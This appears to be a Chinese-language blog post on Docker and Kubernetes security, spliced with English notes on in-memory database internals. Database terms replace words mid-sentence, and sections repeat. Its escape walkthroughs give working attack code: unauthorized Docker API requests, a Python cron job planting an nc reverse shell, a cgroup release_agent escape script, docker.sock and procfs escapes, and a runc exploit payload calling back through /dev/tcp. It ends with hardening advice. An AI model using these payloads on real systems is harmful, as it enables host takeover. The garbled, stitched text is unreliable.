ljluestc'Blog

Jan 23 2023

Table of Contents

Cloud Native Security
Memory Database
1. 判断当前机器是否为Docker容器环境
Memory Database
OLTP index B+Tree Bw-Tree
Store model data layout and system catalogs
vectorized execution

vectorized execution

Parallel hash JOIN algorithm

判断当前机器是否为Docker容器环境

Optimizer implementation overview

判断当前机器是否为Docker容器环境

OThe optimizer implements top-down and bottom-up

判断当前机器是否为Docker容器环境

cost model

判断当前机器是否为Docker容器环境

Cloud Native Security

database history

Cloud native (Cloud Native) is a set of technical system and methodology, which consists of two words, cloud (Cloud) and native (Native). Cloud (Cloud) means that the application is located in the cloud, rather than the traditional data center; Native (Native) means that the application is designed with the cloud environment in mind from the beginning, natively designed for the cloud, and runs optimally on the cloud , make full use of the flexibility and distributed advantages of the cloud platform.

Representative cloud-native technologies include containers, service mesh (Service Mesh), microservices (Microservice), immutable infrastructure, and declarative API.

disk database

DBMSs have dealt with various hardware constraints for most of their history When the database was originally designed, the hardware was very different Single processor (single core), severely limited RAM, database must be stored on disk, disk is much slower than it is now But now the memory capacity is very large, even the data can be put in the memory Usually structured data is relatively small, and unstructured or semi-structured data sets are relatively large We need to understand why traditional disk-oriented databases with large caches do not achieve optimal performance Disk-oriented database: the main storage location of the database is a non-volatile device HDD or SSD Databases are usually organized as fixed-size page structures The system uses a cache pool to cache data from disk into memory Moving pages back and forth between disk and memory in the cache The ID of the tuple record must be converted to a location in memory The worker thread must pin the page to ensure that it will not be swapped out to disk Concurrency control: the system must assume that a transaction may stall at any time while reading data that is not in memory Logging and recovery: Most databases use the STEAL + NO-Force cache strategy, and modifications must be flushed to the WAL The log contains records before and after modification There is a lot of work to keep track of the various LSNs The time ratio of various mechanisms: BUFFER 34% LATCH 14% LOCK 16% LOG 12% BTREE 16% REAL WORK 7% Paper: OLTP Through the Locking Glass, and What We Found There

Memory Database

构建-部署-运行

DBMSs have dealt with various hardware constraints for most of their history Assume that the location of the main store is permanently in memory Early ideas were proposed in the 80's, but due to memory price and capacity, it is now easy to do The first in-memory databases were released in the 90s, such as TimesTen, DataBlitz, Altibase data organization No longer stored by slotted pages, but still organized by pages Direct memory pointer access vs. record ID Fixed vs. Mutable Datapools Detecting software bugs from corrupted databases using checksums The operating system also organizes memory by pages Index: usually rebuilt after the database is restarted, the main reason is to avoid log overhead query processing Sequential processing is no longer significantly faster than random processing The traditional one-record-at-a-time iteration model gets slower and slower due to function calls This problem is more serious in OLAP database Logging and recovery DBMS also requires WAL on non-volatile storage Use group commits to batch flushes to amortize fsync overhead Various LSNs are no longer needed since there are no dirty pages bottleneck If IO is no longer the slowest resource, the architecture of most DBMSs needs to be changed due to other bottlenecks Including: Locking/Latching, Cache-Line Misses, pointer chasing, predicate calculation, network concurrency control isolation For in-memory databases, transaction locks are the same cost as accessing memory The new bottleneck is the contention caused by things accessing the same data The database can store lock information and tuple data together: to ensure CPU cache locality Mutex is too slow, need to use CAS instruction Two-part lock (2PL): deadlock detection, deadlock prevention Timestamp sorting (T/O): Check conflicts every time you read and write, and copy the tuples for each access to ensure repeated reading; OCC: All changes are kept in a private space, and conflicts are checked when committing Low-conflict optimistic protocol, high-conflict scenario pessimistic protocol Overhead bottlenecks for various concurrency protocols Lock chatter: 2PL deadlock detection, 2PL WAIT_DIE Timestamp distribution: all timestamp protocols + WAIT_DIE Memory allocation: OCC + MVCC (don't use malloc) think: In-memory database design is very different from disk database The world is finally happy with in-memory data storage and processing DRAM growth stagnates compared to SSD

构建时安全(Build)
- 以规则引擎的形式运营监管容器镜像
  - Dockerfile
  - 可疑文件
  - 敏感权限
  - 敏感端口
  - 基础软件漏洞
  - 业务软件
部署时安全(Deployment)
- Kubernetes
运行时安全(Runtime)
- HIDS

攻击前后

攻击前：裁剪攻击面，减少对外暴露的攻击面（本文涉及的场景关键词：隔离）；
攻击时：降低攻击成功率（本文涉及的场景关键词：加固）；
攻击后：减少攻击成功后攻击者所能获取的有价值的信息、数据以及增加留后门的难度等。

容器攻击面

Linux内核漏洞
- 内核提权
- Memory Database
容器自身
- CVE-2019-5736：runc - container breakout vulnerability
不安全部署(配置)
- 特权容器或者以root权限运行容器；
- 不合理的Capability配置（权限过大的Capability）。

Memory Database

判断当前机器是否为Docker容器环境

检查PID的进程名

如果该进程就是应用进程则判断是容器，而如果是 init 进程或者 systemd 进程，则不一定是容器，当然不能排除是容器的情况，比如 LXD 实例的进程就为/sbin/init。

ps -p1

检查内核文件

容器和虚拟机不一样的是，容器和宿主机是共享内核的，因此理论上容器内部是没有内核文件的，除非挂载了宿主机的/boot目录。

1 2	KERNEL_PATH=$(cat /proc/cmdline \| tr ' ' '\n' \| awk -F '=' '/BOOT_IMAGE/{print $2}') test -e $KERNEL_PATH && echo "Not Sure" \|\| echo "Container"

检查 /proc/1/cgroup 是否存在含有docker字符串，并且这条命令可以获取到docker容器的uuid。

1
2
3

cat /proc/1/cgroup

cat /proc/1/cgroup | grep -qi docker && echo "Docker" || echo "Not Docker"

检查根目录是否存在.dockerenv文件

容器是通过 cgroup 实现资源限制，每个容器都会放到一个 cgroup 组中，如果是 Docker，则 cgroup 的名称为docker-xxxx，其中xxxx为 Docker 容器的 UUID。而控制容器的资源，本质就是控制运行在容器内部的进程资源，因此我们可以通过查看容器内部进程为 1 的 cgroup 名称获取线索。

1
2
3

ls -la /.dockerenv

[[ -f /.dockerenv ]] && echo "Docker" || echo "Not Docker"

其他方式

sudo readlink /proc/1/exe
// 如果返回system字样则为宿主机

systemd-detect-virt -c
// 返回none则为宿主机

Memory Database

用户层
- 用户配置不当
- 危险挂载
服务层: 容器服务自身缺陷(程序漏洞)
系统层: Linux内核漏洞

配置不当导致Docker逃逸

Docker Remote API 未授权访问

docker swarm

1	docker swarm 是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展，由docker官方提供

docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务，可以通过HTTP、Python、调用API来操作Docker。

漏洞环境搭建

使用vulhub搭建漏洞环境：docker daemon api 未授权访问漏洞

漏洞利用一容器RCE

获取主机上所有容器：

1	curl -i -s -X GET http://<docker_host>:PORT/containers/json

创建一个将在容器上执行的”exec”实例

POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188

{
  "AttachStdin": true,
  "AttachStdout": true,
  "AttachStderr": true,
  "Cmd": ["cat", "/etc/passwd"],
  "DetachKeys": "ctrl-p,ctrl-q",
  "Privileged": true,
  "Tty": true
}

bash 命令

curl -i -s -X POST \
-H "Content-Type: application/json" \
--data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \
http://<docker_host>:PORT/containers/<container_id>/exec

启动exec实例

POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json

{
 "Detach": false,
 "Tty": false
}

bash命令

curl -i -s -X POST \
-H 'Content-Type: application/json' \
--data-binary '{"Detach": false,"Tty": false}' \
http://<docker_host>:PORT/exec/<exec_id>/start

漏洞利用二宿主机RCE

利用方法是，我们随意启动一个容器，并将宿主机的/etc目录挂载到容器中，便可以任意读写文件了。我们可以将命令写入crontab配置文件，进行反弹shell。

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

使用cdk进行漏洞利用

使用cdk直接执行命令：

1	./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"

挂在宿主机根目录/到容器内部/host，然后执行用户输入的指令来篡改宿主机的文件，比如可以写/etc/crontab来搞定宿主机。

vectorized execution：Exploit: docker api pwn

Docker 高危启动参数 –privileged 特权模式启动容器

原因

当操作者执行docker run --privileged时，When the operator executes docker run --privileged, Docker will allow the container to access all devices on the host, and at the same time modify the configuration of AppArmor or SELinux so that the container has almost the same access rights as those processes running directly on the host.

环境搭建

1	sudo docker run -itd --privileged ubuntu:latest /bin/bash

漏洞利用

查看磁盘文件: fdisk -l
新建目录以备挂载: mkdir /aa
将宿主机/dev/sda1目录挂载至容器内 /aa: mount /dev/sda1 /aa
即可写文件获取权限或数据

使用cdk：

1	./cdk run mount-disk

Docker 高危启动参数 –cap-add=SYS_ADMIN 利用

Docker 通过Linux namespace use Docker implements 6 resource isolation through Linux namespace, including host name, user authority, file system, network, process number, and inter-process communication. However, some startup parameters grant greater permissions to the container, thus breaking the boundary of resource isolation.

--cap-add=SYS_ADMIN  启动时，允许执行mount特权操作，需获得资源挂载进行利用。
--net=host           启动时，绕过Network Namespace
--pid=host              启动时，绕过PID Namespace
--ipc=host              启动时，绕过IPC Namespace

前提：

在容器内root用户
容器必须使用SYS_ADMIN Linux capability运行
容器必须缺少AppArmor配置文件，否则将允许mount syscall
cgroup v1虚拟文件系统必须以读写方式安装在容器内部

我们需要一个cgroup，可以在其中写入notify_on_release文件(for enable cgroup notifications)，挂载cgroup控制器并创建子cgroup，创建/bin/sh进程并将其PID写入cgroup.procs文件，sh退出后执行release_agent文件。

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

查看导出的文件

1 2	ls /tmp/cgrp cat /output

危险挂载导致Docker逃逸

挂载目录（-v /:/soft）

1	docker run -itd -v /dir:/dir ubuntu:18.04 /bin/bash

挂载 Docker Socket

逃逸复现

首先创建一个容器并挂载/var/run/docker.sock

1	docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu

在该容器内安装Docker命令行客户端

apt-update
apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
"deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/ \
$(lsb_release -cs) \
stable"
apt-get update
apt-get install docker-ce docker-ce-cli containerd.io

接着使用该客户端通过Docker Socket与Docker守护进程通信，发送命令创建并运行一个新的容器，将宿主机的根目录挂载到新创建的容器内部

1	docker run -it -v /:/host ubuntu:18.04 /bin/bash

在新容器内执行chroot将根目录切换到挂载的宿主机根目录。

1	chroot /test

使用cdk工具执行命令：

1	./cdk run docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"

挂载 procfs 目录

关于procfs

procfs是一个伪文件系统，它动态反映着系统内进程及其他组件的状态，其中有许多十分敏感重要的文件。因此，将宿主机的procfs挂载到不受控的容器中也是十分危险的，尤其是在该容器内默认启用root权限，且没有开启User Namespace时

漏洞利用过程比较复杂，但是可以通过cdk快速利用。example:

宿主机启动测试容器，挂载宿主机的procfs，尝试逃逸当前容器。docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc –rm -it ubuntu bash
容器内部执行 ./cdk run mount-procfs /mnt/host_proc “touch /tmp/exp-success”
宿主机中出现/tmp/exp-success文件，说明exp已经成功执行，攻击者可以在宿主机执行任意命令。

vectorized execution：Exploit: mount procfs

挂载 cgroup 目录

使用cdk进行利用

1	./cdk run mount-cgroup "<shell-cmd>"

程序漏洞导致Docker逃逸

CVE-2019-5736 runcMemory Database漏洞

漏洞详情

Docker、containerd或者其他基于runc的容器运行时存在安全漏洞，攻击者通过特定的容器镜像或者exec操作可以获取到宿主机的runc执行时的文件句柄并修改掉runc的二进制文件，从而获取到宿主机的root执行权限。

影响范围

Docker版本 < 18.09.2
runc版本 <= 1.0-rc6。

利用步骤

使用POC：

POC: CVE-2019-5736-PoC

修改payload

1 2	vi main.go payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"

编译

1	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

拷贝到docker容器中执行
等待受害者使用docker exec连接容器
收到反弹shell

CVE-2019-14271 Docker cp 命令Memory Database攻击漏洞

漏洞详情

当Docker宿主机使用cp命令时，会调用辅助进程docker-tar，该进程没有被容器化，且会在运行时动态加载一些libnss.so库。黑客可以通过在容器中替换libnss.so等库，将代码注入到docker-tar中。当Docker用户尝试从容器中拷贝文件时将会执行恶意代码，成功实现Docker逃逸，获得宿主机root权限。

影响范围

Docker 19.03.0

漏洞vectorized execution

Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

CVE-2019-13139 Docker build code execution

漏洞vectorized execution

CVE-2019-13139 - Docker build code execution

内核漏洞导致Docker 逃逸

DirtyCow(CVE-2016-5195)脏牛漏洞实现Docker 逃逸

漏洞描述

1	Dirty Cow（CVE-2016-5195）是Linux内核中的权限提升漏洞，通过它可实现DockerMemory Database，获得root权限的shell。

Docker 与宿主机共享内核，因此容器需要在存在dirtyCow漏洞的宿主机里。

漏洞复现

环境获取：git clone https://github.com/gebl/dirtycow-docker-vdso.git

工具使用 CDK

CDK：https://github.com/cdk-team/CDK

复制到container内

# 宿主机
docker cp /Users/ljluestc/Downloads/cdk_linux_amd64 e39eb7abd9e6:/root

# Container
cd /root
mv cdk_linux_amd64 cdk
chmod 777 cdk

常用命令

# 信息收集
cdk evaluate

# 列举全部exp
cdk run --list

# 执行指定的exp
cdk run <script-name> [options]

OLTP index B+Tree Bw-Tree

通过cdk的evaluate的检测项，可以看一下OLTP index B+Tree Bw-Tree。

B+Tree Bw-Tree full key data structure An order-preserving "full key" data structure holds all bits of a key in a node Worker threads must compare complete search keys In the next lesson we discuss "partial key" data structures (such as Trie) main content Memory T-Tree Lock-free Bw-Tree B+Tree optimistic locking observe The original B+Tree is an efficient access method designed for slow disks For in-memory databases, are there any other alternatives? T-Tree Based on the balanced binary tree AVL, the key is not saved in the node, but the pointer to the original value is saved Invented in 1986, used in TimesTen and some other early in-memory databases Advantages: uses less memory because keys are not kept in nodes; DBMS simultaneously evaluates all predicates on the table (not just predicates on indexed attributes) when accessing tuples Disadvantages: difficult to balance; difficult to achieve safe concurrency; pointer chasing problem when performing scans, violating cache locality Bw-Tree CAS can only update one address at a time, which limits the design of the data structure: a lock-free B+Tree cannot be constructed, and multiple pointers must be updated when splitting/merging (SMO) What if we had a layer of indirection that atomically updated multiple addresses at the same time? Lock-free B+Tree index, proposed in the Microsoft Hekaton project Key ideas: ① Deltas: no in-place updates, reducing cache failures ② Mapping table: CAS running on the physical location of the page Bw-Tree operations: Delta update, Search, conflict update, Consolidation, GC, reference counting, Epoch GC,, structure change performance comparison Processor: 1 socket, 10 cores w/ 2xHT Payload: 50m random integer keys (64-bit)

k8s搭建踩坑

vectorized execution：

先通过docker-desktop安装k8s，vectorized execution：https://github.com/maguowei/k8s-docker-desktop-for-mac
安装k8s kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml
开启本地代理 kubectl proxy
访问 http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
下方步骤获取token
安装helm
1. brew install helm
2. helm repo add stable http://mirror.azure.cn/kubernetes/charts/
3. helm repo update
4. helm install my-mysql stable/mysql

创建一个用户：

1	kubectl apply -f dashboard-adminuser.yaml

dashboard-adminuser.yaml 内容如下：

apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kube-system

获取token

1	kubectl -n kube-system describe secret $(kubectl -n kube-system get secret \| grep admin-user \| awk '{print $1}')

kube-proxy边界绕过(CVE-2020-8558)

攻击者可能通过同一局域网下的容器，或在集群节点上访问同一个二层域下的相邻节点上绑定监听了本地127.0.0.1端口的TCP/UDP服务，从而获取接口信息。

详细介绍可以vectorized execution：CVE-2020-8558：Kubernetes 本地主机边界绕过漏洞通告

列出可能受影响的服务：

1 2	lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN lsof +c 15 -P -n -i4UDP@127.0.0.1

K8s Api-server

检查ENV信息判断当前容器是否属于K8s Pod，获取K8s api-server连接地址并尝试匿名登录，如果成功意味着可以直接通过api-server接管K8s集群。

vectorized execution：https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

前提是必须k8s支持匿名登录，默认是不支持匿名登录的。如果存在这个问题，可以用cdk kcurl anonymous去发起HTTP请求。

K8s Service Account

K8s集群创建的Pod中，容器内部默认携带K8s Service Account的认证凭据(/run/secrets/kubernetes.io/serviceaccount/token)，CDK将利用该凭据尝试认证K8s api-server服务器并访问高权限接口，如果执行成功意味着该账号拥有高权限，您可以直接利用Service Account管理K8s集群。

测试如下：

-w869

通过cdk连接K8s api-server发起自定义HTTP请求：

先通过cdk evaluate判断是否存在这个问题

-w829

再获取k8s的api-server地址：

-w526

然后通过cdk kcurl进行请求

-w866

之后使用CDK可以部署后门Pod和影子k8s api-server。

Store model data layout and system catalogs

这部分翻译自网络，后期整理。

Container

Always use the latest version of Docker
Only allow trusted users to control the Docker daemon
Ensuring that there are rules in place, can provide a review of the following
1. Docker daemon

Ensure all Docker files and directories are owned by an appropriate user (usually root) and set their file permissions to restrictive values to protect all Docker files and directories

Use a registry with a valid registry certificate or a registry that uses TLS to minimize the risk of traffic interception.

如果您使用的容器中没有在映像中定义显式容器用户，则应启用用户名称空间支持，这将允许您将容器用户重新映射为主机用户。

禁止容器获取新特权。默认情况下，允许容器获取新特权，因此必须显式设置此配置。您可以采取的最小化特权升级攻击的另一步骤是删除映像中的setuid和setgid权限。

以非root用户（UID不为0）运行容器。默认情况下，容器以root用户身份以容器内的root用户身份运行。

构建容器时，请仅使用受信任的基本映像。

使用不包含可能导致更大攻击面的不必要软件包的最小基础映像。

实施强有力的治理策略，以强制进行频繁的图像扫描。

构建一个工作流，该工作流定期标识并从主机中删除陈旧或未使用的图像和容器。

不要将机密存储在映像/ Dockerfile中。默认情况下，允许您将机密存储在Dockerfile中，但是将机密存储在映像中将使该映像的任何用户都可以访问该机密。

运行容器时，请删除容器按需运行所需的所有功能。

不要使用–privileged标志运行容器，因为这种类型的容器将具有底层主机可用的大多数功能。该标志还将覆盖您使用CAP DROP或CAP ADD设置的所有规则。(添加–no-new-privileges标志，始终使用来运行docker映像，–security-opt=no-new-privileges以防止使用setuid或setgid二进制文件升级特权。)

不要在容器上挂载敏感的主机系统目录，尤其是在可写模式下，这可能会使它们暴露于恶意更改之下，从而导致主机受损。

不要在容器中运行sshd。默认情况下，ssh守护程序将不会在容器中运行，并且您不应该安装ssh守护程序来简化SSH服务器的安全性管理

不要在容器内映射1024以下的任何端口，因为它们会传输敏感数据，因此会被视为特权端口。默认情况下，Docker会将容器端口映射到49153-65525范围内的端口，但它允许将容器映射到特权端口。根据一般经验，请确保仅在容器上打开需要的端口。

除非必要，否则不要共享主机的网络名称空间，进程名称空间，IPC名称空间，用户名称空间或UTS名称空间，以确保Docker容器与基础主机之间的正确隔离。

指定容器按设计运行所需的内存和CPU数量，而不是依赖于任意数量。默认情况下，Docker容器无限制地平均共享其资源。

将容器的根文件系统设置为只读。一旦运行，容器就不需要更改根文件系统。对根文件系统进行的任何更改都可能出于恶意目的。为了保留容器的不变性-不修补新容器而是从新映像重新创建容器-您不应使根文件系统可写。

施加PID限制。容器的优点之一是严格的过程标识符（PID）控制。内核中的每个进程都承载唯一的PID，容器利用Linux PID名称空间为每个容器提供PID层次结构的单独视图。对PID设置限制可有效限制每个容器中运行的进程数。限制容器中的进程数可以防止新进程的大量产生以及潜在的恶意横向移动。施加PID限制还可以防止叉子炸弹（不断自我复制的过程）和异常过程。通常，这样做的好处是，如果您的服务始终运行特定数量的进程，那么将PID限制设置为确切的数量可以缓解许多恶意行为，包括反向Shell和远程代码注入–实际上，

不要将您的挂载传播规则配置为共享。共享挂载传播意味着对挂载所做的任何更改都将传播到该挂载的所有实例。而是将挂载传播设置为从属模式或私有模式，以便对卷进行的必要更改不会与不需要该更改的容器共享（或传播到该容器）。

不要将docker exec命令与privated或user = root选项一起使用，因为此设置可以使容器具有扩展的Linux功能

不要使用默认网桥“ docker0”。使用默认网桥可以让您轻松应对ARP欺骗和MAC泛洪攻击。相反，容器应位于用户定义的网络上，而不是默认的“ docker0”网桥。

不要将Docker套接字安装在容器内，因为这种方法将允许容器内的进程执行命令，使其完全控制主机。

规则5-禁止容器间通讯（–icc = false）

使用Linux安全模块（seccomp，AppArmor或SELinux）

规则7-限制资源（内存，CPU，文件描述符，进程，重新启动）

规则＃8-将文件系统和卷设置为只读

规则10-将日志记录级别至少设置为INFO¶

Kubernetes安全最佳实践

对于RBAC，请为特定用户或用户组指定您的Roles和ClusterRoles，而不是向任何用户或用户组授予cluster-admin特权。
使用Kubernetes RBAC时避免重复权限，因为这样做可能会导致操作问题。
删除未使用或不活动的RBAC角色，以便在对故障进行故障排除或调查安全事件时将注意力集中在活动的角色上。
使用Kubernetes网络策略隔离您的Pod，并明确允许应用程序正常运行所需的通信路径。否则，您将同时遭受横向和南北威胁。
如果您的Pod需要Internet访问（入口或出口），则创建适当的网络策略以实施正确的网络分段/防火墙规则，然后创建该网络策略所针对的标签，最后将您的Pod与该标签关联。
使用PodSecurityPolicy准入控制器可以确保实施适当的管理策略。PodSecurityPolicy控制器可以阻止容器以root身份运行，或者确保容器的根文件系统以只读方式安装（这些建议听起来很耳熟，因为它们都在之前要采取的Docker措施清单中）。
使用Kubernetes准入控制器来实施映像注册表管理策略，以便自动拒绝从不受信任的注册表中获取的所有映像。

安全问题

上次扫描日期超过60天的主机上有多少张图像？
多少个图像/容器具有高严重性漏洞？
这些高度严重的易受攻击的容器会影响哪些部署？
受影响的部署中是否有任何存储秘密的容器？
是否有任何易受攻击的容器以root身份或特权标志运行？
Pod中是否有没有与之关联的网络策略（意味着它允许所有通信）的易受攻击的容器？
生产中运行的任何容器都会受到此漏洞的影响吗？
我们正在使用的图像来自哪里？
我们如何阻止从不受信任的注册表中提取的图像？
我们能够查看容器运行时正在执行哪些进程吗？
哪些集群，名称空间和节点不符合Docker和Kubernetes的CIS基准测试？

Dockerfile需要注意的问题

确保USER已经被指定
确保基本的镜像版本已经固定
确保操作系统包版本已经固定
避免使用ADD，尽量使用COPY
避免使用apt/apk upgrade
避免在RUN指令中调用curl获取bash文件

静态分析工具

k8s config扫描工具

OLTP index B+Tree Bw-Tree

通过cdk的evaluate的检测项，可以看一下OLTP index B+Tree Bw-Tree。

k8s搭建踩坑

vectorized execution：

先通过docker-desktop安装k8s，vectorized execution：https://github.com/maguowei/k8s-docker-desktop-for-mac
安装k8s kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml
开启本地代理 kubectl proxy
访问 http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
下方步骤获取token
安装helm
1. brew install helm
2. helm repo add stable http://mirror.azure.cn/kubernetes/charts/
3. helm repo update
4. helm install my-mysql stable/mysql

创建一个用户：

1	kubectl apply -f dashboard-adminuser.yaml

dashboard-adminuser.yaml 内容如下：

apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kube-system

获取token

1	kubectl -n kube-system describe secret $(kubectl -n kube-system get secret \| grep admin-user \| awk '{print $1}')

kube-proxy边界绕过(CVE-2020-8558)

攻击者可能通过同一局域网下的容器，或在集群节点上访问同一个二层域下的相邻节点上绑定监听了本地127.0.0.1端口的TCP/UDP服务，从而获取接口信息。

详细介绍可以vectorized execution：CVE-2020-8558：Kubernetes 本地主机边界绕过漏洞通告

列出可能受影响的服务：

1 2	lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN lsof +c 15 -P -n -i4UDP@127.0.0.1

K8s Api-server

检查ENV信息判断当前容器是否属于K8s Pod，获取K8s api-server连接地址并尝试匿名登录，如果成功意味着可以直接通过api-server接管K8s集群。

vectorized execution：https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

前提是必须k8s支持匿名登录，默认是不支持匿名登录的。如果存在这个问题，可以用cdk kcurl anonymous去发起HTTP请求。

K8s Service Account

K8s集群创建的Pod中，容器内部默认携带K8s Service Account的认证凭据(/run/secrets/kubernetes.io/serviceaccount/token)，CDK将利用该凭据尝试认证K8s api-server服务器并访问高权限接口，如果执行成功意味着该账号拥有高权限，您可以直接利用Service Account管理K8s集群。

测试如下：

-w869

通过cdk连接K8s api-server发起自定义HTTP请求：

先通过cdk evaluate判断是否存在这个问题

-w829

再获取k8s的api-server地址：

-w526

然后通过cdk kcurl进行请求

-w866

之后使用CDK可以部署后门Pod和影子k8s api-server。

Store model data layout and system catalogs

这部分翻译自网络，后期整理。

data organization We can think of an in-memory database as a large byte array. The database converts the bytes to the appropriate type through the schema. Each tuple has a header containing metadata. Storing tuples as fixed-length data makes it easy to calculate the starting point of a tuple. main content type representation Data layout/alignment storage model system directory data representation INTEGER/BIGINT/SMALLINT/TINYINT C/C++ representation FLOAT/REAL vs. NUMBERIC/DECIMAL IEEE-754 standard/fixed-point decimals TIME/DATE/TIMESTAMP 32/64 bits seconds, milliseconds, microseconds since UNIX epoch VARCHAR/VARBININARY/TEXT/CLOB If the type is greater than or equal to 64 bits point to other locations The header has the length and the address pointing to the next location, followed by the data Variable-precision numeric types, generally faster than arbitrary-precision numbers Fixed-precision numbers: NUMERIC/DECIMAL require additional metadata preservation Variable length field, VARCHAR(128) Byte alignment has a big impact on performance. (insert load scenario) Unaligned: 0.523 MB/s Alignment plus padding: 11.7 MB/s Alignment reordering: 814.8 MB/s storage model Row storage: n-ary storage model (NSM) The DBMS stores all attributes of a tuple contiguously. Suitable for OLTP workloads Use iterative model one tuple at a time Advantages: faster insert update delete, friendly to queries that require the entire tuple, can use index-oriented storage Disadvantage: Not friendly to queries that only scan some attributes Physical storage: heap table, index table Column Storage: Decomposed Storage Model (DSM) One attribute of all tuples is stored contiguously Suitable for OLAP workloads Iterative model using one vector at a time Advantages: reduced read size, better compression Disadvantages: For enumeration, insertion, insertion, update and deletion, it is slower because of the need for splitting and splicing of tuples hybrid storage When the data is inserted into the database, it is hot (the probability of being updated soon is high) The longer the tuple time, the less frequent the update. A single logical database instance, using different storage models for hot and cold data. For fast OLTP store in NSM. For more efficient OLAP data migration into DSM. Option 1: Separate Execution Engine: Mirrored Oracle/IBM, Delta Storage HANA Option 2: Single Flexible Architecture: Adaptive Storage system directory Almost all databases store database catalogs in the same way as general data DBMS needs to be aware of transactions and automatically support DDL and concurrent transactions Add column: NSM copies the tuple to the new area, and DSM adds a new column segment Delete column: NSM copies the tuple to the new area, marks the column as obsolete, and DSM deletes the column segment Create an index: scan the entire table, fill the index, and must record the change. After the scan is completed, the table is locked to resolve the changed record Delete index: logically delete the index, and all executed transactions must be able to update it Sequence: Unlike the logic of isolation protection, the rollback operation will not roll back the sequence, and all insert operations will conflict with writes think We have abandoned the hybrid storage model Huge amount of work Delta version storage + column storage are basically equivalent System directory is very difficult

Ensure all Docker files and directories are owned by an appropriate user (usually root) and set their file permissions to restrictive values to protect all Docker files and directories

Use a registry with a valid registry certificate or a registry that uses TLS to minimize the risk of traffic interception.

如果您使用的容器中没有在映像中定义显式容器用户，则应启用用户名称空间支持，这将允许您将容器用户重新映射为主机用户。

以非root用户（UID不为0）运行容器。默认情况下，容器以root用户身份以容器内的root用户身份运行。

构建容器时，请仅使用受信任的基本映像。

使用不包含可能导致更大攻击面的不必要软件包的最小基础映像。

实施强有力的治理策略，以强制进行频繁的图像扫描。

构建一个工作流，该工作流定期标识并从主机中删除陈旧或未使用的图像和容器。

不要将机密存储在映像/ Dockerfile中。默认情况下，允许您将机密存储在Dockerfile中，但是将机密存储在映像中将使该映像的任何用户都可以访问该机密。

运行容器时，请删除容器按需运行所需的所有功能。

不要在容器上挂载敏感的主机系统目录，尤其是在可写模式下，这可能会使它们暴露于恶意更改之下，从而导致主机受损。

不要在容器中运行sshd。默认情况下，ssh守护程序将不会在容器中运行，并且您不应该安装ssh守护程序来简化SSH服务器的安全性管理

指定容器按设计运行所需的内存和CPU数量，而不是依赖于任意数量。默认情况下，Docker容器无限制地平均共享其资源。

不要将docker exec命令与privated或user = root选项一起使用，因为此设置可以使容器具有扩展的Linux功能

不要将Docker套接字安装在容器内，因为这种方法将允许容器内的进程执行命令，使其完全控制主机。

规则5-禁止容器间通讯（–icc = false）

使用Linux安全模块（seccomp，AppArmor或SELinux）

规则7-限制资源（内存，CPU，文件描述符，进程，重新启动）

规则＃8-将文件系统和卷设置为只读

规则10-将日志记录级别至少设置为INFO¶

Kubernetes安全最佳实践

对于RBAC，请为特定用户或用户组指定您的Roles和ClusterRoles，而不是向任何用户或用户组授予cluster-admin特权。
使用Kubernetes RBAC时避免重复权限，因为这样做可能会导致操作问题。
删除未使用或不活动的RBAC角色，以便在对故障进行故障排除或调查安全事件时将注意力集中在活动的角色上。
使用Kubernetes网络策略隔离您的Pod，并明确允许应用程序正常运行所需的通信路径。否则，您将同时遭受横向和南北威胁。
如果您的Pod需要Internet访问（入口或出口），则创建适当的网络策略以实施正确的网络分段/防火墙规则，然后创建该网络策略所针对的标签，最后将您的Pod与该标签关联。
